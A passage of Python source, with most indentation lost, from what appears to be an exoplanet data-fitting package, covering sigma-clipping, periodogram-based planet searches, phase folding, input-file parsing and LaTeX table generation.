obj2 = dill.copy(obj)
modify_temp_RV_file(obj2, file_n = file_n, add_error = add_error, data_to_keep = None)
#obj2.epoch = obj.epoch
obj2.fitting(outputfiles=[1,1,0], minimize_fortran=True, minimize_loglik=True,amoeba_starts=0)
JD_data = obj2.fit_results.rv_model.jd[obj2.filelist.idset==file_n]
o_c_data = obj2.fit_results.rv_model.o_c[obj2.filelist.idset==file_n]
data_ind = obj2.filelist.idset
c, low, upp = pdf.sigmaclip(o_c_data, sigma_clip, sigma_clip)
remaining_idx = [x for x, z in enumerate(o_c_data) if z in c]
removed_idx = [x for x, z in enumerate(o_c_data) if z not in c]
modify_temp_RV_file(obj, file_n = file_n, add_error = add_error, data_to_keep = remaining_idx)
del obj2
if verbose:
print("\n %s clipped epochs:"%type)
for z in JD_data[removed_idx]:
print(z)
return obj
if type == 'act':
if len(obj.act_data_sets[file_n]) == 0:
print("No act. file # %s"%(file_n))
return
#obj.act_data_sets[file_n] = dill.copy(obj.act_data_sets_init[file_n])
org_epoch = obj.act_data_sets_init[file_n][0]
org_data = obj.act_data_sets_init[file_n][1]
org_data_sig = obj.act_data_sets_init[file_n][2]
org_data_mean = org_data - np.mean(org_data)
if sigma_clip != None:
c, low, upp = pdf.sigmaclip(org_data_mean, sigma_clip, sigma_clip)
remaining_idx = [x for x, z in enumerate(org_data_mean) if z in c]
removed_idx = [x for x, z in enumerate(org_data_mean) if z not in c]
obj.act_data_sets[file_n][1] = np.take(obj.act_data_sets_init[file_n][1], remaining_idx)
obj.act_data_sets[file_n][0] = np.take(obj.act_data_sets_init[file_n][0], remaining_idx)
obj.act_data_sets[file_n][2] = np.take(obj.act_data_sets_init[file_n][2], remaining_idx)
new_org_data = obj.act_data_sets[file_n][1]
new_org_data_mean = new_org_data - np.mean(new_org_data)
if verbose:
print("\n %s clipped epochs:"%type)
for z in org_epoch[removed_idx]:
print(z)
if remove_mean == True:
obj.act_data_sets[file_n][1] = new_org_data_mean
else:
if remove_mean == True:
obj.act_data_sets[file_n][0] = org_epoch
obj.act_data_sets[file_n][1] = org_data_mean
obj.act_data_sets[file_n][2] = org_data_sig
else:
obj.act_data_sets[file_n][0] = org_epoch
obj.act_data_sets[file_n][1] = org_data
obj.act_data_sets[file_n][2] = org_data_sig
return obj
if type == 'tra':
if len(obj.tra_data_sets[file_n]) == 0:
print("No transit file # %s"%(file_n))
return
#obj.act_data_sets[file_n] = dill.copy(obj.act_data_sets_init[file_n])
org_epoch = obj.tra_data_sets_init[file_n][0]
org_data = obj.tra_data_sets_init[file_n][1]
org_data_sig = obj.tra_data_sets_init[file_n][2]
org_data_o_c = obj.tra_data_sets_init[file_n][3]
#org_data = obj.tra_data_sets_init[file_n][1]
org_data_mean = org_data_o_c - np.mean(org_data_o_c)
if sigma_clip != None:
c, low, upp = pdf.sigmaclip(org_data_mean, sigma_clip, sigma_clip)
remaining_idx = [x for x, z in enumerate(org_data_mean) if z in c]
removed_idx = [x for x, z in enumerate(org_data_mean) if z not in c]
obj.tra_data_sets[file_n][3] = np.take(obj.tra_data_sets_init[file_n][3], remaining_idx)
obj.tra_data_sets[file_n][0] = np.take(obj.tra_data_sets_init[file_n][0], remaining_idx)
obj.tra_data_sets[file_n][2] = np.take(obj.tra_data_sets_init[file_n][2], remaining_idx)
obj.tra_data_sets[file_n][1] = np.take(obj.tra_data_sets_init[file_n][1], remaining_idx)
obj.tra_data_sets[file_n][4] = np.take(obj.tra_data_sets_init[file_n][4], remaining_idx)
new_org_data = obj.tra_data_sets[file_n][1]
new_org_data_mean = new_org_data - np.mean(new_org_data)
if verbose:
print("\n %s clipped epochs:"%type)
for z in org_epoch[removed_idx]:
print(z)
#if remove_mean == True:
# obj.tra_data_sets[file_n][1] = new_org_data_mean
else:
# if remove_mean == True:
# obj.tra_data_sets[file_n][0] = org_epoch
# obj.tra_data_sets[file_n][1] = org_data_mean
# obj.tra_data_sets[file_n][2] = org_data_sig
#
# else:
obj.tra_data_sets[file_n][0] = org_epoch
obj.tra_data_sets[file_n][1] = org_data
obj.tra_data_sets[file_n][2] = org_data_sig
obj.tra_data_sets[file_n][3] = org_data_o_c
obj.tra_data_sets[file_n][4] = org_data_o_c
return obj
def transit_data_norm(obj, file_n = 0, norm = False, verbose = True):
if len(obj.tra_data_sets[file_n]) == 0:
print("No transit file # %s"%(file_n))
return
if norm == True:
obj.tra_data_sets[file_n][0] = obj.tra_data_sets_init[file_n][0]
obj.tra_data_sets[file_n][1] = obj.tra_data_sets_init[file_n][1]/np.mean(obj.tra_data_sets_init[file_n][1])
obj.tra_data_sets[file_n][2] = obj.tra_data_sets_init[file_n][2]/np.mean(obj.tra_data_sets_init[file_n][1])
else:
obj.tra_data_sets[file_n][0] = dill.copy(obj.tra_data_sets_init[file_n][0])
obj.tra_data_sets[file_n][1] = dill.copy(obj.tra_data_sets_init[file_n][1])
obj.tra_data_sets[file_n][2] = dill.copy(obj.tra_data_sets_init[file_n][2])
return obj
### some experimets! ###
def gen_RV_curve(obj,x=None):
obj2 = dill.copy(obj)
f = open('datafiles/RV_curve', 'wb') # open the file
if len(x) > 3:
for j in range(len(x)):
#print(fit_new.rv_data_sets[i][0][j])
text = b"%s %s %s \n"%(bytes(str(x[j]).encode()),bytes(str(0.0).encode()),bytes(str(1.0).encode()) )
f.write(text)
f.close()
obj2.add_dataset("RV_curve", "datafiles/RV_curve",0.0,0.0) # the last two entries are initial offset and jitter
os.system("rm datafiles/RV_curve")
obj2.fitting(outputfiles=[0,1,0], minimize_fortran=True, minimize_loglik=True, amoeba_starts=0, print_stat=False)
jd = obj2.fit_results.rv_model.jd
# rvs = obj2.fit_results.rv_model.rvs
o_c = obj2.fit_results.rv_model.o_c*(-1)
#print(o_c)
return np.array([jd,o_c])
#############################
def file_from_path(path):
head, tail = ntpath.split(path)
return tail or ntpath.basename(head)
def run_command_with_timeout(args, secs, output=False, pipe=False): # set output=True if you need to save the output
'''
Run a command and kill if it takes too long.
'''
# print(args)
if not (pipe):
text=tempfile.TemporaryFile() # because PIPE usually has too low capacity
proc = Popen(args, shell=True, preexec_fn=os.setsid, stdout=text, stderr=text)
else:
proc = Popen(args, shell=True, preexec_fn=os.setsid, stdout=PIPE, stderr=PIPE)
# print(proc)
proc_thread = Thread(target=proc.wait)
proc_thread.start()
proc_thread.join(secs)
if proc_thread.is_alive():
#print (proc.pid)
try:
os.killpg(proc.pid, signal.SIGTERM)
except OSError:
pass
print('Process #{} killed after {} seconds'.format(proc.pid, secs))
flag = -1
return '',flag
if not (pipe):
text.seek(0)
string_to_output=text.readlines()
else:
text=proc.communicate()[0]
string_to_output=text.splitlines()
for i in range(len(string_to_output)):
string_to_output[i]=string_to_output[i].decode('utf-8').split()
if not (pipe):
text.close()
flag = 1
if (output):
return string_to_output,flag # besides the flag which informs about successful termination we also return all the console output in case we want to save it in a variable
else:
return '',flag
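# Hedged usage sketch: run a short shell command ("echo hello" is an arbitrary
# example) with a 5-second timeout and collect its tokenized output.
def _example_run_command_with_timeout():
    out, flag = run_command_with_timeout("echo hello", 5, output=True)
    # flag == 1 -> finished in time; flag == -1 -> process group was killed.
    return out, flag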
def run_command_with_timeout_old(args, secs, output=False, pipe=False): # set output=True if you need to save the output
proc = Popen(args, shell=True, preexec_fn=os.setsid, stdout=PIPE)
proc_thread = Thread(target=proc.wait)
proc_thread.start()
proc_thread.join(secs)
text = proc.communicate()[0]
flag = 1
if proc_thread.is_alive():
try:
os.killpg(proc.pid, signal.SIGTERM)
except OSError:
print('Process #{} killed after {} seconds'.format(proc.pid, secs))
flag = -1
#text = '0 0 0 0'
return text.decode('utf-8'),flag
#return proc, flag , text.decode('utf-8')
return text.decode('utf-8'),flag
def phase_RV_planet_signal(obj,planet):
if obj.npl ==0 or len(obj.fit_results.rv_model.jd) ==0:
return
else:
copied_obj = dill.copy(obj)
if(copied_obj.mod_dynamical):
copied_obj.mod_dynamical = False
index = planet - 1
############################################
############# here is the trick! ##########
############################################
pp0 = copied_obj.params.planet_params[7*index+0] # we define a variable to be the planet amplitude Kj
copied_obj.params.planet_params[7*index+0] = 0.0000001 # then we set Kj to be 0, i.e. remove the j-th planet signal
copied_obj.fitting(minimize_loglik=True, amoeba_starts=0,
outputfiles=[0,1,1],return_flag=False, npoints=int(len(obj.fit_results.model)),
model_max=int(max(obj.fit_results.model_jd)-max(copied_obj.fit_results.rv_model.jd)),
model_min=int(copied_obj.epoch -min(obj.fit_results.model_jd)))
# and we create the static Nplanet model for the data and the model curve
# now this model residuals will contain ONLY the j-th planet signal + the best fit residuals
copied_obj.params.planet_params[7*index+0] = pp0 # we restore Kj to its best fit value.
############################################
######### trick is over ##########
############################################
#print(copied_obj.params.planet_params[7*index+1])
#print((copied_obj.epoch- copied_obj.fit_results.rv_model.jd[0])% copied_obj.params.planet_params[7*index+1] )
############ phase fold fix for sparse model ######
model_time_phase = np.array( (copied_obj.fit_results.model_jd -copied_obj.fit_results.model_jd[0] + (copied_obj.fit_results.model_jd[0] - copied_obj.epoch) )%copied_obj.params.planet_params[7*index+1] )
model_shift = copied_obj.params.planet_params[7*index+1] - (copied_obj.fit_results.rv_model.jd[0] - copied_obj.epoch )%copied_obj.params.planet_params[7*index+1]
model_time_phase = (model_time_phase + model_shift)% copied_obj.params.planet_params[7*index+1]
sort = sorted(range(len(model_time_phase)), key=lambda k: model_time_phase[k])
model_time_phase = model_time_phase[sort]
phased_model = obj.fit_results.model[sort] - copied_obj.fit_results.model[sort]
############ phase data ######
data_time_phase = np.array( (copied_obj.fit_results.rv_model.jd - copied_obj.fit_results.rv_model.jd[0])% copied_obj.params.planet_params[7*index+1] )
sort = sorted(range(len(data_time_phase)), key=lambda k: data_time_phase[k])
data_time_phase = data_time_phase[sort]
phased_data = copied_obj.fit_results.rv_model.o_c[sort]# - copied_obj.fit_results.rv_model.rvs[sort]
phased_data_err = copied_obj.fit_results.rv_model.rv_err[sort]
phased_data_idset = copied_obj.fit_results.idset[sort]
if copied_obj.doGP == True:
phased_data = phased_data - copied_obj.gp_model_data[0][sort]
#else:
# rv_data = ph_data[1]
model = [model_time_phase, phased_model]
data = [data_time_phase, phased_data, phased_data_err, phased_data_idset]
#del copied_obj
#####################
obj.ph_data[planet-1] = data
obj.ph_model[planet-1] = model
return data, model
def find_planets_restricted(obj,fend=1.5):
power_levels = np.array([0.1,0.01,0.001])
# check if RV data is present
if obj.filelist.ndset <= 0:
return
# the first one on the data GLS
if obj.gls.power.max() <= obj.gls.powerLevel(obj.auto_fit_FAP_level):
return obj
else:
if obj.npl !=0:
for j in range(obj.npl):
obj.remove_planet(obj.npl-(j+1))
mean_anomaly_from_gls = np.degrees((((obj.epoch - float(obj.gls.hpstat["T0"]) )% (obj.gls.hpstat["P"]) )/ (obj.gls.hpstat["P"]) ) * 2*np.pi)
# obj.add_planet(obj.gls.hpstat["amp"],obj.gls.hpstat["P"],0.0,0.0,mean_anomaly_from_gls -90.0,90.0,0.0)
obj.add_planet(obj.gls.hpstat["amp"],obj.gls.hpstat["P"],0.0,0.0,mean_anomaly_from_gls -90.0,90.0,0.0)
obj.use.update_use_planet_params_one_planet(0,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
run_gls_o_c(obj,fend=fend)
#now inspect the residuals
for i in range(1,int(obj.auto_fit_max_pl)):
if obj.gls_o_c.power.max() <= obj.gls_o_c.powerLevel(obj.auto_fit_FAP_level):
for j in range(obj.npl):
obj.use.update_use_planet_params_one_planet(j,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
obj = run_gls_o_c(obj)
return obj
#elif (1/RV_per_res.hpstat["fbest"]) > 1.5:
else:
mean_anomaly_from_gls = np.degrees((((obj.epoch - float(obj.gls_o_c.hpstat["T0"]) )% (obj.gls_o_c.hpstat["P"]) )/ (obj.gls_o_c.hpstat["P"]) ) * 2*np.pi)
obj.add_planet(obj.gls_o_c.hpstat["amp"],obj.gls_o_c.hpstat["P"],0.0,0.0,mean_anomaly_from_gls -90.0,90.0,0.0)
obj.use.update_use_planet_params_one_planet(i,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
run_gls_o_c(obj,fend=fend)
#else:
# continue
for j in range(obj.npl):
obj.use.update_use_planet_params_one_planet(j,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
run_gls_o_c(obj,fend=fend)
return obj
def find_planets(obj):
# check if RV data is present
if obj.filelist.ndset <= 0:
return
# the first one on the data GLS
if obj.gls.power.max() <= obj.gls.powerLevel(obj.auto_fit_FAP_level):
return obj
else:
if obj.npl !=0:
for j in range(obj.npl):
obj.remove_planet(obj.npl-(j+1))
mean_anomaly_from_gls = np.degrees((((obj.epoch - float(obj.gls.hpstat["T0"]) )% (obj.gls.hpstat["P"]) )/ (obj.gls.hpstat["P"]) ) * 2*np.pi)
obj.add_planet(obj.gls.hpstat["amp"],obj.gls.hpstat["P"],0.0,0.0,mean_anomaly_from_gls -90.0,90.0,0.0)
obj.use.update_use_planet_params_one_planet(0,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
run_gls_o_c(obj)
#now inspect the residuals
for i in range(1,int(obj.auto_fit_max_pl)):
if obj.gls_o_c.power.max() <= obj.gls_o_c.powerLevel(obj.auto_fit_FAP_level):
for j in range(obj.npl):
obj.use.update_use_planet_params_one_planet(j,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
obj = run_gls_o_c(obj)
return obj
#elif (1/RV_per_res.hpstat["fbest"]) > 1.5:
else:
mean_anomaly_from_gls = np.degrees((((obj.epoch - float(obj.gls_o_c.hpstat["T0"]) )% (obj.gls_o_c.hpstat["P"]) )/ (obj.gls_o_c.hpstat["P"]) ) * 2*np.pi)
obj.add_planet(obj.gls_o_c.hpstat["amp"],obj.gls_o_c.hpstat["P"],0.0,0.0,mean_anomaly_from_gls -90.0,90.0,0.0)
obj.use.update_use_planet_params_one_planet(i,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
run_gls_o_c(obj)
#else:
# continue
for j in range(obj.npl):
obj.use.update_use_planet_params_one_planet(j,True,True,obj.auto_fit_allow_ecc,obj.auto_fit_allow_ecc,True,False,False)
obj.fitting(fileinput=False,outputfiles=[1,1,1], doGP=False, minimize_fortran=True, fortran_kill=3, timeout_sec= 3)
run_gls_o_c(obj)
return obj
def run_gls(obj,fend =1.0,fbeg=10000):
#fbeg = abs(max(obj.fit_results.rv_model.jd)-min(obj.fit_results.rv_model.jd)) * 2.0
omega = 1/ np.logspace(np.log10(fend), np.log10(fbeg), num=int(1000))
if len(obj.fit_results.rv_model.jd) > 5:
RV_per = gls.Gls((obj.fit_results.rv_model.jd, obj.fit_results.rv_model.rvs, obj.fit_results.rv_model.rv_err),
fast=True, verbose=False, norm='ZK',ofac=10, fbeg=omega[-1], fend=omega[0],)
obj.gls = RV_per
else:
return obj
return obj
def run_gls_o_c(obj,fend =1.0,fbeg=10000, as_main = False):
#fbeg = abs(max(obj.fit_results.rv_model.jd)-min(obj.fit_results.rv_model.jd)) * 2.0
omega = 1/ np.logspace(np.log10(fend), np.log10(fbeg), num=int(1000))
if len(obj.fit_results.rv_model.jd) > 5:
RV_per_res = gls.Gls((obj.fit_results.rv_model.jd, obj.fit_results.rv_model.o_c, obj.fit_results.rv_model.rv_err),
fast=True, verbose=False, norm='ZK', ofac=10, fbeg=omega[-1], fend=omega[0],)
if as_main == False:
obj.gls_o_c = RV_per_res
elif as_main == True:
obj.gls = RV_per_res
else:
return obj
return obj
def is_float(n):
'''
Given a string n, verify if it expresses a valid float.
Casting n to string in case an object of type float or similar is given as an argument
'''
return re.match(r'^-?\d*(\.\d+)?(E-?\d+)?$', str(n))
# Given a float or string, verify if it expresses an integer. Optional upper and lower bounds can be supplied, together with whether the inequality on either side should be strict or weak.
def is_int(s,bounded=[False,False],bounds=[0,0],equal=[False,False]):
if is_float(s): # if it is an int, it is certainly float as well
n=float(s) # we need n as a number, not as a string, for comparisons with bounds later
is_an_int=float(s).is_integer()
else:
is_an_int=False
# is_an_int now contains an information if s is an int, but without bounds. Let's introduce bounds:
if(is_an_int): # if it's not an int at all we don't need to check any further
if(bounded[0]): # if there is a lower bound let's apply it
if (n<bounds[0] or (not equal[0] and n==bounds[0])):
is_an_int=False
if(is_an_int): # if the lower bound returned False we don't need to check any further
if(bounded[1]): # if there is a lower bound let's apply it
if (n>bounds[1] or (not equal[1] and n==bounds[1])):
is_an_int=False
return is_an_int
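# Hedged examples (values assumed): is_int with bounds checks both integer-ness and
# the requested strict/weak inequalities.
def _example_is_int():
    a = is_int("5")                                                              # True: plain integer
    b = is_int("5", bounded=[True, True], bounds=[0, 5], equal=[False, True])    # True: 0 < 5 <= 5
    c = is_int("5", bounded=[True, True], bounds=[0, 5], equal=[False, False])   # False: strict upper bound
    return a, b, c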
# If save_wrong_lines is enabled we will save a string 'wrong_line' instead of this line and save indices at which this occurred, otherwise we will skip this line
def convert_array_to_float(a,save_wrong_lines=False):
converting_warnings=Warning_log([],'Converting array to float')
b=[]
if (save_wrong_lines):
wrong_indices=[]
for i in range(len(a)):
if not is_float(a[i]):
if not (save_wrong_lines):
converting_warnings.update_warning_list('Array passed to convert_array_to_float function should only contain floats! Line %d skipped'%(i+1))
else:
b.append('wrong_line')
wrong_indices=np.concatenate((wrong_indices,np.atleast_1d(i)))
else:
b.append(float(a[i]))
converting_warnings.print_warning_log()
if (save_wrong_lines):
return np.array(b),wrong_indices
else:
return np.array(b)
def convert_array_to_int(a, save_wrong_lines=False):
converting_warnings=Warning_log([],'Converting array to int')
b=[]
if (save_wrong_lines):
wrong_indices=[]
for i in range(len(a)):
if not is_int(a[i]):
if not (save_wrong_lines):
converting_warnings.update_warning_list('Array passed to convert_array_to_int function should only contain ints! Line %d skipped'%(i+1))
else:
b.append('wrong_line')
wrong_indices=np.concatenate((wrong_indices,np.atleast_1d(i)))
else:
b.append(int(a[i]))
converting_warnings.print_warning_log()
if (save_wrong_lines):
return np.array(b),wrong_indices
else:
return np.array(b)
#for convenient reading of the input file
def read_file_as_array_of_arrays(inputfile):
a=open(inputfile, 'r')
b=a.readlines() # b as array of strings
c=[]
ic=0 # iterator for values in c
for i in range(len(b)):
b[i]=np.atleast_1d(b[i].split()) # turn a row of b into an array of arrays
c.append([]) # need to make a separate array so every element is of correct type
# convert each string that represents a float into float
for j in range(0,len(b[i])):
if (is_float(b[i][j])):
c[ic].append(float(b[i][j]))
elif not (b[i][j][-1]==':'): # ignore comments, which can be placed by the user as strings ending with a colon; in comments use underscores instead of spaces or an error will arise
c[ic].append(b[i][j])
ic=ic+1
#c = np.array(c, dtype=float)
return c
# for convenient reading of the input file; this variant is a hack that skips the first column (the mcmc lnL value) of each line. To be fixed.
def read_file_as_array_of_arrays_mcmc(inputfile):
a=open(inputfile, 'r')
b=a.readlines() # b as array of strings
c=[]
ic=0 # iterator for values in c
for i in range(len(b)):
b[i]=np.atleast_1d(b[i].split()) # turn a row of b into an array of arrays
c.append([]) # need to make a separate array so every element is of correct type
# convert each string that represents a float into float
for j in range(1,len(b[i])):
if (is_float(b[i][j])):
c[ic].append(float(b[i][j]))
elif not (b[i][j][-1]==':'): # ignore comments, which can be placed by the user as strings ending with a colon; in comments use underscores instead of spaces or an error will arise
c[ic].append(float(b[i][j]))
ic=ic+1
c = np.array(c, dtype=float)
return c
def verify_array_with_bounds(ar,bounds):
'''Verify that the values of array ar fit within the declared bounds; if there are too many/too few bounds, check as many values as possible.'''
if (len(ar)<=len(bounds)):
num=len(ar) # number of values to check
elif (len(ar)>len(bounds)):
num=len(bounds) # number of values to check
verification=True # initial value
for i in range(num):
# check if some of the values doesn't fit in the bounds, if so return False
if (ar[i]<bounds[i][0] or ar[i]>bounds[i][1]):
verification=False
break
return verification
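# Hedged example (arrays assumed): every value must fall inside its [low, high] pair.
def _example_verify_array_with_bounds():
    ok  = verify_array_with_bounds([1.0, 2.0], [[0, 5], [0, 5]])  # True
    bad = verify_array_with_bounds([1.0, 9.0], [[0, 5], [0, 5]])  # False: 9.0 > 5
    return ok, bad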
def latex_pl_param_table(obj, width = 10, precision = 2, asymmetric = False, file_name='test.tex', path='./', return_text=False):
if asymmetric != True:
text = '''
\\begin{table}[ht]
% \\begin{adjustwidth}{-4.0cm}{}
% \\resizebox{0.69\\textheight}{!}
% {\\begin{minipage}{1.1\\textwidth}
\centering
\caption{{}}
\label{table:}
\\begin{tabular}{lrrrrrrrr} % 2 columns
\hline\hline \\noalign{\\vskip 0.7mm}
'''
text = text + '''Parameter \hspace{0.0 mm}'''
for i in range(obj.npl):
text = text + '''& Planet %s '''%chr(98+i)
text = text + '''\\\\
\hline \\noalign{\\vskip 0.7mm}
'''
if obj.type_fit["RV"]== True or obj.type_fit["TTV"]== True:
text = text + '''{0:{width}s}'''.format("$K$ [m\,s$^{-1}$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.params.planet_params[7*i], max(np.abs(obj.param_errors.planet_params_errors[7*i])), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$P$ [day]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.params.planet_params[7*i +1], max(np.abs(obj.param_errors.planet_params_errors[7*i +1])), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$e$ ", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.params.planet_params[7*i +2], max(np.abs(obj.param_errors.planet_params_errors[7*i +2])), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$\omega$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.params.planet_params[7*i +3], max(np.abs(obj.param_errors.planet_params_errors[7*i +3])), width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["RV"]== True or obj.type_fit["TTV"]== True:
text = text + '''{0:{width}s}'''.format("$M_{\\rm 0}$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.params.planet_params[7*i +4], max(np.abs(obj.param_errors.planet_params_errors[7*i +4])), width = width, precision = precision)
text = text + '''\\\\
'''
if obj.mod_dynamical == True:
text = text + '''{0:{width}s}'''.format("$i$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.params.planet_params[7*i +5], max(np.abs(obj.param_errors.planet_params_errors[7*i +5])), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$\Omega$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.params.planet_params[7*i +6], max(np.abs(obj.param_errors.planet_params_errors[7*i +6])), width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["Transit"] == True:
text = text + '''{0:{width}s}'''.format("$t_{\\rm 0}$ [day]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.t0[i], max(np.abs(obj.t0_err[i])), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("Rad. [$R_\odot$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.pl_rad[i], max(np.abs(obj.pl_rad_err[i])), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$a$ [$R_\odot$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.pl_a[i], max(np.abs(obj.pl_a_err[i])), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$a$ [au]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.fit_results.a[i], 0, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$m \sin i$ [$M_{\\rm jup}$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(obj.fit_results.mass[i], 0, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$t_{\omega}$ [day]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format((float(obj.epoch) - (np.radians(obj.params.planet_params[7*i + 4])/(2*np.pi))*obj.params.planet_params[7*i + 1] ), 0, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["RV"]== True:
text = text + '''{0:{width}s}'''.format("RV lin. trend [m\,s$^{-1}$\,day$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(float(obj.params.linear_trend),float(max(np.abs(obj.param_errors.linear_trend_error))) , width = 30, precision = 6)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("RV quad. trend [m\,s$^{-1}$\,day$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(float(obj.rv_quadtr),float(max(np.abs(obj.rv_quadtr_err))) , width = 30, precision = 6)
text = text + '''\\\\
'''
for i in range(obj.filelist.ndset):
text = text + '''{0:{width}s}'''.format("RV$_{\\rm off}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(float(obj.params.offsets[i]), float(max(np.abs(obj.param_errors.offset_errors[i]))), width = width, precision = precision)
text = text + '''\\\\
'''
for i in range(obj.filelist.ndset):
text = text + '''{0:{width}s}'''.format("RV$_{\\rm jit}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(float(obj.params.jitters[i]), float(max(np.abs(obj.param_errors.jitter_errors[i]))), width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["Transit"]== True:
for i in range(10):
if len(obj.tra_data_sets[i]) != 0:
text = text + '''{0:{width}s}'''.format("Tran.$_{\\rm off}$ %s"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(float(obj.tra_off[i]), float(max(np.abs(obj.tra_off_err[i]))), width = width, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
for i in range(10):
if len(obj.tra_data_sets[i]) != 0:
text = text + '''{0:{width}s}'''.format("Tran.$_{\\rm jit}$ %s"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f} $\pm$ {1:{width}.{precision}f} '''.format(float(obj.tra_jitt[i]), float(max(np.abs(obj.tra_jitt_err[i]))), width = width, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$\chi^2$", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.chi2), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$\chi_{\\nu}^2$", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.reduced_chi2), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$rms$ [m\,s$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.rms), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$wrms$ [m\,s$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.wrms), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$-\ln\mathcal{L}$", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.loglik), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("N$_{\\rm RV}$ data", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(len(obj.fit_results.jd), width = width, precision = 0)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("Epoch", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(obj.epoch, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''\\\\
\hline \\noalign{\\vskip 0.7mm}
'''
text = text + '''
